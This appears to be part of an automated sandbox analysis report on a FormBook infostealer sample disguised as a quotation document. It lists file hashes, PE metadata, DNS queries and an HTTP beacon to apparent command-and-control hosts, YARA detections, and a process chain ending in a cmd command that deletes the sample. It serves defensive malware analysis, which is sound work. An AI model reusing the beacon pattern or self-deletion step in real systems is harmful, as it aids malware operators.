                                                      • 173.80.22.224
                                                      lLc1G9C259Get hashmaliciousBrowse
                                                      • 47.216.131.198
                                                      Jp0fvo75qaGet hashmaliciousBrowse
                                                      • 47.209.25.147
                                                      7spunOMzSKGet hashmaliciousBrowse
                                                      • 47.218.42.237
                                                      F2PYGjcpEUGet hashmaliciousBrowse
                                                      • 74.224.134.234

                                                      JA3 Fingerprints

                                                      No context

                                                      Dropped Files

                                                      No context

                                                      Created / dropped Files

                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\QUOTATION LIST FOR NEW ORDER.exe.log
                                                      Process:C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):1314
                                                      Entropy (8bit):5.350128552078965
                                                      Encrypted:false
                                                      SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                                      MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                                      SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                                      SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                                      SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                                      Malicious:true
                                                      Reputation:high, very likely benign file
                                                      Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                      Static File Info

                                                      General

                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Entropy (8bit):7.773783545447779
                                                      TrID:
                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                      • Win32 Executable (generic) a (10002005/4) 49.75%
                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                      • Windows Screen Saver (13104/52) 0.07%
                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                      File name:QUOTATION LIST FOR NEW ORDER.exe
                                                      File size:1347072
                                                      MD5:2a28a3e032a65c25b90f193621b623af
                                                      SHA1:019659bb43b5535a9684d9938aa73e98682b0a61
                                                      SHA256:317613289fb0cce8c301f63922883b30d54bbcdf1cb01bfa772244e03a07dfda
                                                      SHA512:c6aa00f5777d5e0d2f687aaaae1ac8bb9b1689729688088fcde0707c060b8e96b46a133b47d586cb852b277f64b8ce9fd68578d9c25c7f6b702023534494646d
                                                      SSDEEP:24576:wogS/d3ZYdke1b0AIM2Jga9lY7uEmJmwRGPoN7vdiTbnFM:YdvXl9jim/PoiM
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..a..............P.................. ........@.. ....................................@................................

                                                      File Icon

                                                      Icon Hash:00828e8e8686b000

                                                      Static PE Info

                                                      General

                                                      Entrypoint:0x54a0de
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                      Time Stamp:0x6103A829 [Fri Jul 30 07:20:09 2021 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:v4.0.30319
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                      Entrypoint Preview

                                                      Instruction
                                                      jmp dword ptr [00402000h]

                                                      Data Directories

                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x14a08c0x4f.text
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x14c0000x5c8.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x14e0000xc.reloc
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                      Sections

                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x20000x1483440x148400False0.862922011853data7.77803780051IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                      .rsrc0x14c0000x5c80x600False0.440104166667data4.16475165345IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .reloc0x14e0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                      Resources

                                                      NameRVASizeTypeLanguageCountry
                                                      RT_VERSION0x14c0900x338data
                                                      RT_MANIFEST0x14c3d80x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                      Imports

                                                      DLLImport
                                                      mscoree.dll_CorExeMain

                                                      Version Infos

                                                      DescriptionData
                                                      Translation0x0000 0x04b0
                                                      LegalCopyrightTeamViewer 2021 (C)
                                                      Assembly Version4.2.2.0
                                                      InternalNameTup.exe
                                                      FileVersion4.3.0.6
                                                      CompanyNameTeamViewer GmBh
                                                      LegalTrademarks
                                                      Comments
                                                      ProductNameGame Picture
                                                      ProductVersion4.3.0.6
                                                      FileDescriptionGame Picture
                                                      OriginalFilenameTup.exe

                                                      Network Behavior

                                                      Snort IDS Alerts

                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                      08/03/21-18:56:13.121292ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.78.8.8.8
                                                      08/03/21-18:56:14.482122ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.78.8.8.8

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Aug 3, 2021 18:56:03.276704073 CEST4970480192.168.2.7204.11.58.233
                                                      Aug 3, 2021 18:56:03.426737070 CEST8049704204.11.58.233192.168.2.7
                                                      Aug 3, 2021 18:56:03.426877022 CEST4970480192.168.2.7204.11.58.233
                                                      Aug 3, 2021 18:56:03.427073956 CEST4970480192.168.2.7204.11.58.233
                                                      Aug 3, 2021 18:56:03.577406883 CEST8049704204.11.58.233192.168.2.7
                                                      Aug 3, 2021 18:56:03.918870926 CEST4970480192.168.2.7204.11.58.233
                                                      Aug 3, 2021 18:56:04.099133015 CEST8049704204.11.58.233192.168.2.7
                                                      Aug 3, 2021 18:56:06.000478029 CEST8049704204.11.58.233192.168.2.7
                                                      Aug 3, 2021 18:56:06.000588894 CEST4970480192.168.2.7204.11.58.233
                                                      Aug 3, 2021 18:56:06.001934052 CEST8049704204.11.58.233192.168.2.7
                                                      Aug 3, 2021 18:56:06.002037048 CEST4970480192.168.2.7204.11.58.233
                                                      Aug 3, 2021 18:56:17.167814970 CEST4970580192.168.2.747.222.2.124
                                                      Aug 3, 2021 18:56:20.169933081 CEST4970580192.168.2.747.222.2.124
                                                      Aug 3, 2021 18:56:26.170384884 CEST4970580192.168.2.747.222.2.124

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Aug 3, 2021 18:54:13.497689009 CEST6335453192.168.2.78.8.8.8
                                                      Aug 3, 2021 18:54:13.523097038 CEST53633548.8.8.8192.168.2.7
                                                      Aug 3, 2021 18:54:14.489391088 CEST5312953192.168.2.78.8.8.8
                                                      Aug 3, 2021 18:54:14.517411947 CEST53531298.8.8.8192.168.2.7
                                                      Aug 3, 2021 18:54:15.328059912 CEST6245253192.168.2.78.8.8.8
                                                      Aug 3, 2021 18:54:15.353789091 CEST53624528.8.8.8192.168.2.7
                                                      Aug 3, 2021 18:54:16.167668104 CEST5782053192.168.2.78.8.8.8
                                                      Aug 3, 2021 18:54:16.193391085 CEST53578208.8.8.8192.168.2.7
                                                      Aug 3, 2021 18:54:17.116626024 CEST5084853192.168.2.78.8.8.8
                                                      Aug 3, 2021 18:54:17.141563892 CEST53508488.8.8.8192.168.2.7
                                                      Aug 3, 2021 18:54:18.160233021 CEST6124253192.168.2.78.8.8.8
                                                      Aug 3, 2021 18:54:18.193016052 CEST53612428.8.8.8192.168.2.7
                                                      Aug 3, 2021 18:54:19.019804955 CEST5856253192.168.2.78.8.8.8
                                                      Aug 3, 2021 18:54:19.047405958 CEST53585628.8.8.8192.168.2.7
                                                      Aug 3, 2021 18:54:21.165599108 CEST5659053192.168.2.78.8.8.8
                                                      Aug 3, 2021 18:54:21.194493055 CEST53565908.8.8.8192.168.2.7
                                                      Aug 3, 2021 18:54:22.194313049 CEST6050153192.168.2.78.8.8.8
                                                      Aug 3, 2021 18:54:22.363729954 CEST53605018.8.8.8192.168.2.7
                                                      Aug 3, 2021 18:54:23.168865919 CEST5377553192.168.2.78.8.8.8
                                                      Aug 3, 2021 18:54:23.197211027 CEST53537758.8.8.8192.168.2.7
                                                      Aug 3, 2021 18:54:24.453998089 CEST5183753192.168.2.78.8.8.8
                                                      Aug 3, 2021 18:54:24.486718893 CEST53518378.8.8.8192.168.2.7
                                                      Aug 3, 2021 18:54:25.805160046 CEST5541153192.168.2.78.8.8.8
                                                      Aug 3, 2021 18:54:25.833256960 CEST53554118.8.8.8192.168.2.7
                                                      Aug 3, 2021 18:54:28.530322075 CEST6366853192.168.2.78.8.8.8
                                                      Aug 3, 2021 18:54:28.555107117 CEST53636688.8.8.8192.168.2.7
                                                      Aug 3, 2021 18:54:29.475338936 CEST5464053192.168.2.78.8.8.8
                                                      Aug 3, 2021 18:54:29.507994890 CEST53546408.8.8.8192.168.2.7
                                                      Aug 3, 2021 18:54:30.312120914 CEST5873953192.168.2.78.8.8.8
                                                      Aug 3, 2021 18:54:30.340039968 CEST53587398.8.8.8192.168.2.7
                                                      Aug 3, 2021 18:54:31.420591116 CEST6033853192.168.2.78.8.8.8
                                                      Aug 3, 2021 18:54:31.455758095 CEST53603388.8.8.8192.168.2.7
                                                      Aug 3, 2021 18:54:32.760993958 CEST5871753192.168.2.78.8.8.8
                                                      Aug 3, 2021 18:54:32.785573006 CEST53587178.8.8.8192.168.2.7
                                                      Aug 3, 2021 18:54:33.714972019 CEST5976253192.168.2.78.8.8.8
                                                      Aug 3, 2021 18:54:33.749150038 CEST53597628.8.8.8192.168.2.7
                                                      Aug 3, 2021 18:56:03.089462996 CEST5432953192.168.2.78.8.8.8
                                                      Aug 3, 2021 18:56:03.265300035 CEST53543298.8.8.8192.168.2.7
                                                      Aug 3, 2021 18:56:08.939980984 CEST5805253192.168.2.78.8.8.8
                                                      Aug 3, 2021 18:56:09.950802088 CEST5805253192.168.2.78.8.8.8
                                                      Aug 3, 2021 18:56:11.309310913 CEST5805253192.168.2.78.8.8.8
                                                      Aug 3, 2021 18:56:12.105026007 CEST53580528.8.8.8192.168.2.7
                                                      Aug 3, 2021 18:56:13.117250919 CEST53580528.8.8.8192.168.2.7
                                                      Aug 3, 2021 18:56:14.478785992 CEST53580528.8.8.8192.168.2.7
                                                      Aug 3, 2021 18:56:17.127902985 CEST5400853192.168.2.78.8.8.8
                                                      Aug 3, 2021 18:56:17.165973902 CEST53540088.8.8.8192.168.2.7

                                                      ICMP Packets

                                                      TimestampSource IPDest IPChecksumCodeType
                                                      Aug 3, 2021 18:56:13.121292114 CEST192.168.2.78.8.8.8cff5(Port unreachable)Destination Unreachable
                                                      Aug 3, 2021 18:56:14.482121944 CEST192.168.2.78.8.8.8cff5(Port unreachable)Destination Unreachable

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                      Aug 3, 2021 18:56:03.089462996 CEST192.168.2.78.8.8.80x45f3Standard query (0)www.everesttechsolutions.comA (IP address)IN (0x0001)
                                                      Aug 3, 2021 18:56:08.939980984 CEST192.168.2.78.8.8.80xa17fStandard query (0)www.tomio.techA (IP address)IN (0x0001)
                                                      Aug 3, 2021 18:56:09.950802088 CEST192.168.2.78.8.8.80xa17fStandard query (0)www.tomio.techA (IP address)IN (0x0001)
                                                      Aug 3, 2021 18:56:11.309310913 CEST192.168.2.78.8.8.80xa17fStandard query (0)www.tomio.techA (IP address)IN (0x0001)
                                                      Aug 3, 2021 18:56:17.127902985 CEST192.168.2.78.8.8.80x872cStandard query (0)www.quotovate.comA (IP address)IN (0x0001)

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                      Aug 3, 2021 18:56:03.265300035 CEST8.8.8.8192.168.2.70x45f3No error (0)www.everesttechsolutions.comeveresttechsolutions.comCNAME (Canonical name)IN (0x0001)
                                                      Aug 3, 2021 18:56:03.265300035 CEST8.8.8.8192.168.2.70x45f3No error (0)everesttechsolutions.com204.11.58.233A (IP address)IN (0x0001)
                                                      Aug 3, 2021 18:56:12.105026007 CEST8.8.8.8192.168.2.70xa17fServer failure (2)www.tomio.technonenoneA (IP address)IN (0x0001)
                                                      Aug 3, 2021 18:56:13.117250919 CEST8.8.8.8192.168.2.70xa17fServer failure (2)www.tomio.technonenoneA (IP address)IN (0x0001)
                                                      Aug 3, 2021 18:56:14.478785992 CEST8.8.8.8192.168.2.70xa17fServer failure (2)www.tomio.technonenoneA (IP address)IN (0x0001)
                                                      Aug 3, 2021 18:56:17.165973902 CEST8.8.8.8192.168.2.70x872cNo error (0)www.quotovate.com47.222.2.124A (IP address)IN (0x0001)

                                                      HTTP Request Dependency Graph

                                                      • www.everesttechsolutions.com

                                                      HTTP Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      0192.168.2.749704204.11.58.23380C:\Windows\explorer.exe
                                                      TimestampkBytes transferredDirectionData
                                                      Aug 3, 2021 18:56:03.427073956 CEST405OUTGET /p4se/?RFQLn6=2dFdaDmhFhA0QZgP&-Zmt_=aCSsC2Wtvj0xQ8J4lkVrtXAo/y9YES1uuye3QtaBHWEeyHJ7dSrXHfQKVk1syv4zArANdeJ+Lg== HTTP/1.1
                                                      Host: www.everesttechsolutions.com
                                                      Connection: close
                                                      Data Raw: 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      Aug 3, 2021 18:56:06.000478029 CEST407INHTTP/1.1 301 Moved Permanently
                                                      Date: Tue, 03 Aug 2021 16:56:03 GMT
                                                      Server: Apache
                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                      Pragma: no-cache
                                                      X-Redirect-By: WordPress
                                                      Set-Cookie: PHPSESSID=f818a483df7096bf3685fb921c9165a5; path=/
                                                      Upgrade: h2,h2c
                                                      Connection: Upgrade, close
                                                      Location: https://everesttechsolutions.com/p4se/?RFQLn6=2dFdaDmhFhA0QZgP&-Zmt_=aCSsC2Wtvj0xQ8J4lkVrtXAo/y9YES1uuye3QtaBHWEeyHJ7dSrXHfQKVk1syv4zArANdeJ+Lg==
                                                      Referrer-Policy: no-referrer-when-downgrade
                                                      Content-Length: 0
                                                      Content-Type: text/html; charset=UTF-8


                                                      Code Manipulations

                                                      Statistics

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      Analysis Process: QUOTATION LIST FOR NEW ORDER.exe PID: 5532 Parent PID: 5588

                                                      General

                                                      Start time:18:54:22
                                                      Start date:03/08/2021
                                                      Path:C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe'
                                                      Imagebase:0x580000
                                                      File size:1347072 bytes
                                                      MD5 hash:2A28A3E032A65C25B90F193621B623AF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Reputation:low

                                                      Analysis Process: QUOTATION LIST FOR NEW ORDER.exe PID: 4768 Parent PID: 5532

                                                      General

                                                      Start time:18:54:50
                                                      Start date:03/08/2021
                                                      Path:C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe
                                                      Imagebase:0x90000
                                                      File size:1347072 bytes
                                                      MD5 hash:2A28A3E032A65C25B90F193621B623AF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low

                                                      Analysis Process: QUOTATION LIST FOR NEW ORDER.exe PID: 4760 Parent PID: 5532

                                                      General

                                                      Start time:18:54:51
                                                      Start date:03/08/2021
                                                      Path:C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe
                                                      Imagebase:0x590000
                                                      File size:1347072 bytes
                                                      MD5 hash:2A28A3E032A65C25B90F193621B623AF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.373559944.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.373559944.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.373559944.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.374153809.0000000000B80000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.374153809.0000000000B80000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.374153809.0000000000B80000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.374626991.00000000010B0000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.374626991.00000000010B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.374626991.00000000010B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      Reputation:low

                                                      Analysis Process: explorer.exe PID: 3292 Parent PID: 4760

                                                      General

                                                      Start time:18:54:56
                                                      Start date:03/08/2021
                                                      Path:C:\Windows\explorer.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\Explorer.EXE
                                                      Imagebase:0x7ff662bf0000
                                                      File size:3933184 bytes
                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Analysis Process: cmmon32.exe PID: 6056 Parent PID: 3292

                                                      General

                                                      Start time:18:55:20
                                                      Start date:03/08/2021
                                                      Path:C:\Windows\SysWOW64\cmmon32.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\cmmon32.exe
                                                      Imagebase:0x3d0000
                                                      File size:36864 bytes
                                                      MD5 hash:2879B30A164B9F7671B5E6B2E9F8DFDA
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.513637775.0000000000540000.00000004.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.513637775.0000000000540000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.513637775.0000000000540000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.515171970.0000000003040000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.515171970.0000000003040000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.515171970.0000000003040000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      Reputation:moderate

                                                      Analysis Process: cmd.exe PID: 6068 Parent PID: 6056

                                                      General

                                                      Start time:18:55:25
                                                      Start date:03/08/2021
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:/c del 'C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe'
                                                      Imagebase:0x870000
                                                      File size:232960 bytes
                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Analysis Process: conhost.exe PID: 5984 Parent PID: 6068

                                                      General

                                                      Start time:18:55:26
                                                      Start date:03/08/2021
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff774ee0000
                                                      File size:625664 bytes
                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Disassembly

                                                      Code Analysis

                                                      Reset < >